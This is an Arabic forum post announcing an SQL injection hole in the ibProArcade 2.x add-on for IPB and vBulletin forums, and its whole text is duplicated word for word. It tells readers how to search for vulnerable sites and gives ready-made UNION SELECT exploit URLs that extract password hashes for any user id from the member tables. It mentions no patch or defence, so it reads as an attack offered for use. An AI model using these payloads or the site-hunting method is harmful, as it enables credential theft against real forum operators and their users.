نزلت اليوم ثغرة جديدة من نوع SQL injection , في هاك ibProArcade 2.x
لجميع المنتديات الي تركب هذا الهاك , الهاك مشهور ومنتشر بشكل كبير , وضيفته الهاك هو للالعاب.
يمكنك البحث عن المواقع المصابه عن طريق البحث عن :
ibProArcade v2.5.1 © Chris Kelly 2004 www.ibproarcade.com
استغلال الثغره لمنتديات IPB :
رمز:
http://www.sitename.com/Forum/index.php?act=Arcade&module=report&user=-1%20union%20select%20password%20from%20ibf_members %20where%20id=1
رمز:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
استغلال الثغره لمنتديات vb :
رمز:
http://www.sitename.com/vb/index.php?act=Arcade&module=report&user=-1%20union%20select%20password%20from%20user%20wher e%20userid=1
رمز:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
لجميع المنتديات الي تركب هذا الهاك , الهاك مشهور ومنتشر بشكل كبير , وضيفته الهاك هو للالعاب.
يمكنك البحث عن المواقع المصابه عن طريق البحث عن :
ibProArcade v2.5.1 © Chris Kelly 2004 www.ibproarcade.com
استغلال الثغره لمنتديات IPB :
رمز:
http://www.sitename.com/Forum/index.php?act=Arcade&module=report&user=-1%20union%20select%20password%20from%20ibf_members %20where%20id=1
رمز:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
استغلال الثغره لمنتديات vb :
رمز:
http://www.sitename.com/vb/index.php?act=Arcade&module=report&user=-1%20union%20select%20password%20from%20user%20wher e%20userid=1
رمز:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]